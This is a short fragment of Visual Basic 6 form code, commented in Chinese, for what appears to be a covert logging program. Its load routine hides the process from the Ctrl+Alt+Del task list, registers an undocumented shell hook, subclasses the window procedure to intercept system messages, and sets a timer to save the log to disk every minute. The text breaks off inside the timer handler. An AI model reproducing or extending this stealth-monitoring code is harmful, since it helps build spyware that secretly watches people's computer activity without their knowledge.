' 窗体部分的代码(form1.frm)
option explicit
private sub form_load()
dim tmp as long
' 将日志程序的名称从 ctrl+alt+del 列表中清除
tmp = registerserviceprocess(byval 0&, 1)
timer1.interval = 60000 ' 定时器的作用是每隔一分钟将日志存盘
' 定义一个新的系统级的消息类型
msg_id = registerwindowmessage("shellhook")
call registershellhook(hwnd, 1) ' 调用未公开的函数(进行注册)
' 实施拦截:在存储了原入口地址的同时,将新地址指向自定义的函数windowproc
original = setwindowlong(hwnd, gwl_wndproc, addressof windowproc)
end sub
private sub form_unload(cancel as integer)
dim tmp as long
call registershellhook(hwnd, 0) ' 调用未公开的函数(取消注册)
tmp = setwindowlong(hwnd, gwl_wndproc, original) ' 将入口地址还原
end sub
private sub timer1_timer()
if len(text1.text) > 0 then
